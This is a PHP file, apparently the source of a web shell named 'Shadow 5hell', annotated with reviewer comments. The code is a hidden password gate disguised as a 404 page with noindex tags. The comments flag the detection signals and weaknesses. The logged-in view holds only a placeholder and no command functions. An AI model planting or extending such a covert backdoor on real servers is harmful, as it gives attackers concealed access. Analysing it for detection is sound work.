This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
| <?php | |
| /** | |
| * Shadow 5hell | |
| * | |
| * @category Security | |
| * | |
| * @package Shadow | |
| * | |
| * @author Cvar1984 <[email protected]> | |
| * | |
| * @license WTFPL http://www.wtfpl.net/txt/copying/ | |
| * | |
| * @link https://github.com/Cvar1984 | |
| */ | |
// Not read anywhere in the visible source.
$email = '';
// bcrypt hash ($2y$, cost 10) that login() checks with password_verify().
// A hard-coded hash literal like this is a stable string for file-content scanning.
$password = '$2y$10$.WwaTEc/a4WSxMr0GZZypOSqkiwkia.fIlxGEIYM/Yw4a1WKo0H9G';
// Not read anywhere in the visible source.
$serverIp = $_SERVER['SERVER_ADDR'];
// Key used inside $_SESSION (not the session cookie name): the hex-encoded
// Host request header followed by the stored hash.
$sessionName = bin2hex($_SERVER['HTTP_HOST']) . $password;
// Value that marks a session as authenticated: SHA-1 of whatever getClientIp() returns.
// NOTE(review): sha1() always yields a non-empty hex string, so the fallback
// to $password below never takes effect.
$sessionKey = sha1(getClientIp());
if (!$sessionKey) {
    $sessionKey = $password;
}
session_start();
| /* --------------------------- function definition -------------------------- */ | |
/**
 * Check a submitted password, then always send the decoy page and end the request.
 *
 * When a "pass" field is posted, the session marker is reset to an empty string
 * and set to $sessionKey only if password_verify() accepts the value against the
 * stored hash. The response is identical for right and wrong passwords: a 404
 * status line with an HTML body holding a one-field form. The marker is only
 * evaluated by the top-level check on a later request.
 *
 * Review notes: a 404 response whose body contains a POST form is a mismatch
 * that response-body inspection can pick up; the session id is not regenerated
 * after a successful check.
 *
 * @return void
 */
function login()
{
    global $password, $sessionName, $sessionKey;

    if (isset($_POST['pass'])) {
        $submitted = $_POST["pass"];
        // Reset first so a failed or aborted check never leaves an old marker in place.
        $_SESSION[$sessionName] = '';
        if (password_verify($submitted, $password)) {
            $_SESSION[$sessionName] = $sessionKey;
        }
    }

    // Status line says "not found" although a body with a form follows.
    header('HTTP/1.1 404 Not Found');
    echo <<<EOF
<!DOCTYPE HTML>
<html>
<head>
<title>404 Not Found</title>
<meta name="robots" content="noindex;nofollow" />
</head>
<body>
<form method="POST" onsubmit="return true">
<input name="pass" />
<input type="submit" />
</form>
</body>
</html>
EOF;
    exit;
}
/**
 * End the current session: drop its variables, then its stored data.
 *
 * The session cookie itself is not expired here, and nothing in the visible
 * source calls this function.
 *
 * @return void
 */
function logout()
{
    // session_destroy() does not empty $_SESSION for the rest of the request,
    // so the variables are cleared explicitly first.
    session_unset();
    // Remove the server-side data registered to this session.
    session_destroy();
}
/**
 * Return the first address-like value found in $_SERVER, or false if none is set.
 *
 * Lookup order: HTTP_CLIENT_IP, HTTP_X_FORWARDED_FOR, HTTP_X_FORWARDED,
 * HTTP_FORWARDED_FOR, HTTP_FORWARDED, REMOTE_ADDR. The value is returned
 * verbatim, without validation or splitting.
 *
 * Review note: every HTTP_* entry is filled from a request header the client
 * chooses, and those are consulted before REMOTE_ADDR, so the result is not a
 * reliable identity for access decisions or session binding. A forwarded header
 * may also hold a comma-separated list or arbitrary text.
 *
 * @return string|bool
 */
function getClientIp()
{
    // Same precedence as the original if/elseif chain; REMOTE_ADDR is the last resort.
    $lookupOrder = [
        'HTTP_CLIENT_IP',
        'HTTP_X_FORWARDED_FOR',
        'HTTP_X_FORWARDED',
        'HTTP_FORWARDED_FOR',
        'HTTP_FORWARDED',
        'REMOTE_ADDR',
    ];

    foreach ($lookupOrder as $serverKey) {
        if (isset($_SERVER[$serverKey])) {
            return $_SERVER[$serverKey];
        }
    }

    return false;
}
| /* ------------------------------ end function ------------------------------ */ | |
| /* ---------------------------------- auth --------------------------------- */ | |
// Gate for everything below: login() ends the request with exit, so execution
// continues only when the stored session marker is identical to $sessionKey.
// $sessionKey is derived from getClientIp(), so the comparison depends on
// request data the client can influence.
if (!isset($_SESSION[$sessionName]) || $_SESSION[$sessionName] !== $sessionKey) {
    login();
}
| /* -------------------------------- logged in -------------------------------- */ | |
// Authenticated view. No status header is set on this path (the 404 header is
// only sent inside login()), so the page titled "404 Not Found" goes out with
// the server's default status. The favicon is fetched by the browser from an
// external host, which is visible in client-side network logs.
// The three strings are emitted back to back with no newline between them.
echo <<<'EOF'
<!DOCTYPE HTML>
<html>
<head>
<title>404 Not Found</title>
<meta name="robots" content="noindex;nofollow" />
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<link rel="shortcut icon" href="https://cvar1984.github.io/favicon.png" />
</head>
<body>
EOF;
// Placeholder content block.
echo <<<'EOF'
<div class="konten">
<h1>Anjaymabar</h1>
</div>
EOF;
// Closing markup.
echo <<<'EOF'
</body>
</html>
EOF;